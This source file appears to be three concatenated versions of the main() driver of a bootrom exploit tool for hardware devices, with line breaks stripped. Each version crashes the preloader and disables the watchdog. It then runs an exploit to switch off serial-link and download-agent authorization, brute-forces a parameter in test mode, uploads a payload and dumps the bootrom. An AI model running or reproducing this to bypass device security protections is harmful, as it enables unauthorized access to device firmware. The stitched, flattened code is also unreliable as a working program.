def main(): parser = argparse.ArgumentParser() parser.add_argument("-c", "--config", help="Device config") parser.add_argument("-t", "--test", help="Testmode", action="store_true") parser.add_argument("-w", "--watchdog", help="Watchdog address(in hex)") parser.add_argument("-u", "--uart", help="UART base address(in hex)") parser.add_argument("-v", "--var_1", help="var_1 value(in hex)") parser.add_argument("-a", "--payload_address", help="payload_address value(in hex)") parser.add_argument("-p", "--payload", help="Payload to use") parser.add_argument("-s", "--serial_port", help="Connect to existing serial port") parser.add_argument("-f", "--force", help="Force exploit on insecure device", action="store_true") parser.add_argument("-n", "--no_handshake", help="Skip handshake", action="store_true") parser.add_argument("-m", "--crash_method", help="Method to use for crashing preloader (0, 1, 2)", type=int) arguments = parser.parse_args() if arguments.config: if not os.path.exists(arguments.config): raise RuntimeError("Config file {} doesn't exist".format( arguments.config)) elif not os.path.exists(DEFAULT_CONFIG): raise RuntimeError("Default config is missing") if arguments.serial_port: device = Device(arguments.serial_port) else: device = Device().find() config, serial_link_authorization, download_agent_authorization, hw_code = get_device_info( device, arguments) while device.preloader: device = crash_preloader(device, config) config, serial_link_authorization, download_agent_authorization, hw_code = get_device_info( device, arguments) log("Disabling watchdog timer") device.write32(config.watchdog_address, 0x22000064) if serial_link_authorization or download_agent_authorization or arguments.force: log("Disabling protection") payload = prepare_payload(config) result = exploit(device, config.watchdog_address, config.payload_address, config.var_0, config.var_1, payload) if arguments.test: while not result: device.dev.close() config.var_1 += 1 log("Test mode, testing " + hex(config.var_1) + "...") device = Device().find() device.handshake() while device.preloader: device = crash_preloader(device, config) device.handshake() result = exploit(device, config.watchdog_address, config.payload_address, config.var_0, config.var_1, payload) else: log("Insecure device, sending payload using send_da") if not arguments.payload: config.payload = DEFAULT_PAYLOAD if not arguments.payload_address: config.payload_address = DEFAULT_DA_ADDRESS payload = prepare_payload(config) payload += b'\x00' * 0x100 device.send_da(config.payload_address, len(payload), 0x100, payload) device.jump_da(config.payload_address) result = device.read(4) bootrom__name = "bootrom_" + hex(hw_code)[2:] + ".bin" if result == to_bytes(0xA1A2A3A4, 4): log("Protection disabled") elif result == to_bytes(0xC1C2C3C4, 4): dump_brom(device, bootrom__name) elif result == to_bytes(0x0000C1C2, 4) and device.read(4) == to_bytes( 0xC1C2C3C4, 4): dump_brom(device, bootrom__name, True) elif result != b'': raise RuntimeError("Unexpected result {}".format(result.hex())) else: log("Payload did not reply")
def main(): parser = argparse.ArgumentParser() parser.add_argument("-c", "--config", help="Device config") parser.add_argument("-t", "--test", help="Testmode", action="store_true") parser.add_argument("-w", "--watchdog", help="Watchdog address(in hex) for testmode") parser.add_argument("-v", "--var_1", help="var_1 value(in hex) for testmode") parser.add_argument("-p", "--payload_address", help="payload_address value(in hex) for testmode") arguments = parser.parse_args() if arguments.config: if not os.path.exists(arguments.config): raise RuntimeError("Config file {} doesn't exist".format(arguments.config)) elif not os.path.exists(DEFAULT_CONFIG): raise RuntimeError("Default config is missing") device = Device().find() device.handshake() hw_code = device.get_hw_code() hw_sub_code, hw_ver, sw_ver = device.get_hw_dict() secure_boot, serial_link_authorization, download_agent_authorization = device.get_target_config() if arguments.config: config_file = open(arguments.config) config = Config().from_file(config_file, hw_code) config_file.close() else: try: config = Config().default(hw_code) except NotImplementedError as e: if arguments.test: config = Config() if arguments.var_1: config.var_1 = int(arguments.var_1, 16) if arguments.watchdog: config.watchdog_address = int(arguments.watchdog, 16) if arguments.payload_address: config.payload_address = int(arguments.payload_address, 16) config.payload = "generic_dump_payload.bin" log(e) else: raise e if not os.path.exists(PAYLOAD_DIR + config.payload): raise RuntimeError("Payload file {} doesn't exist".format(PAYLOAD_DIR + config.payload)) print() log("Device hw code: {}".format(hex(hw_code))) log("Device hw sub code: {}".format(hex(hw_sub_code))) log("Device hw version: {}".format(hex(hw_ver))) log("Device sw version: {}".format(hex(sw_ver))) log("Device secure boot: {}".format(secure_boot)) log("Device serial link authorization: {}".format(serial_link_authorization)) log("Device download agent authorization: {}".format(download_agent_authorization)) print() log("Disabling watchdog timer") device.write32(config.watchdog_address, 0x22000064) if serial_link_authorization or download_agent_authorization: log("Disabling protection") with open(PAYLOAD_DIR + config.payload, "rb") as payload: payload = payload.read() result = exploit(device, config.watchdog_address, config.payload_address, config.var_0, config.var_1, payload) if arguments.test: while not result: config.var_1 += 1 log("Test mode, testing " + hex(config.var_1) + "...") device = Device().find() device.handshake() result = exploit(device, config.watchdog_address, config.payload_address, config.var_0, config.var_1, payload) bootrom__name = "bootrom_" + hex(hw_code)[2:] + ".bin" if result == to_bytes(0xA1A2A3A4, 4): log("Protection disabled") elif result == to_bytes(0xC1C2C3C4, 4): dump_brom(device, bootrom__name) elif result == to_bytes(0x0000C1C2, 4) and device.read(4) == to_bytes(0xC1C2C3C4, 4): dump_brom(device, bootrom__name, True)
def main(): parser = argparse.ArgumentParser() parser.add_argument("-c", "--config", help="Device config") parser.add_argument("-t", "--test", help="Testmode", action="store_true") parser.add_argument("-w", "--watchdog", help="Watchdog address(in hex)") parser.add_argument("-u", "--uart", help="UART base address(in hex)") parser.add_argument("-v", "--var_1", help="var_1 value(in hex)") parser.add_argument("-a", "--payload_address", help="payload_address value(in hex)") parser.add_argument("-p", "--payload", help="Payload to use") parser.add_argument("-s", "--serial_port", help="Connect to existing serial port") parser.add_argument("-f", "--force", help="Force exploit on insecure device", action="store_true") parser.add_argument("-n", "--no_handshake", help="Skip handshake", action="store_true") arguments = parser.parse_args() if arguments.config: if not os.path.exists(arguments.config): raise RuntimeError("Config file {} doesn't exist".format( arguments.config)) elif not os.path.exists(DEFAULT_CONFIG): raise RuntimeError("Default config is missing") if arguments.serial_port: device = Device(arguments.serial_port) else: device = Device().find() if not arguments.no_handshake: device.handshake() hw_code = device.get_hw_code() hw_sub_code, hw_ver, sw_ver = device.get_hw_dict() secure_boot, serial_link_authorization, download_agent_authorization = device.get_target_config( ) if arguments.config: config_file = open(arguments.config) config = Config().from_file(config_file, hw_code) config_file.close() else: try: config = Config().default(hw_code) except NotImplementedError as e: if arguments.test: config = Config() log(e) else: raise e if arguments.test: config.payload = DEFAULT_PAYLOAD if arguments.var_1: config.var_1 = int(arguments.var_1, 16) if arguments.watchdog: config.watchdog_address = int(arguments.watchdog, 16) if arguments.uart: config.uart_base = int(arguments.uart, 16) if arguments.payload_address: config.payload_address = int(arguments.payload_address, 16) if arguments.payload: config.payload = arguments.payload if not os.path.exists(PAYLOAD_DIR + config.payload): raise RuntimeError( "Payload file {} doesn't exist".format(PAYLOAD_DIR + config.payload)) print() log("Device hw code: {}".format(hex(hw_code))) log("Device hw sub code: {}".format(hex(hw_sub_code))) log("Device hw version: {}".format(hex(hw_ver))) log("Device sw version: {}".format(hex(sw_ver))) log("Device secure boot: {}".format(secure_boot)) log("Device serial link authorization: {}".format( serial_link_authorization)) log("Device download agent authorization: {}".format( download_agent_authorization)) print() log("Disabling watchdog timer") device.write32(config.watchdog_address, 0x22000064) if serial_link_authorization or download_agent_authorization or arguments.force: log("Disabling protection") payload = prepare_payload(config) result = exploit(device, config.watchdog_address, config.payload_address, config.var_0, config.var_1, payload) if arguments.test: while not result: device.dev.close() config.var_1 += 1 log("Test mode, testing " + hex(config.var_1) + "...") device = Device().find() device.handshake() result = exploit(device, config.watchdog_address, config.payload_address, config.var_0, config.var_1, payload) else: log("Insecure device, sending payload using send_da") if not arguments.payload: config.payload = DEFAULT_PAYLOAD if not arguments.payload_address: config.payload_address = DEFAULT_DA_ADDRESS payload = prepare_payload(config) payload += b'\x00' * 0x100 device.send_da(config.payload_address, len(payload), 0x100, payload) device.jump_da(config.payload_address) result = device.read(4) bootrom__name = "bootrom_" + hex(hw_code)[2:] + ".bin" if result == to_bytes(0xA1A2A3A4, 4): log("Protection disabled") elif result == to_bytes(0xC1C2C3C4, 4): dump_brom(device, bootrom__name) elif result == to_bytes(0x0000C1C2, 4) and device.read(4) == to_bytes( 0xC1C2C3C4, 4): dump_brom(device, bootrom__name, True) elif result != b'': raise RuntimeError("Unexpected result {}".format(result.hex())) else: log("Payload did not reply")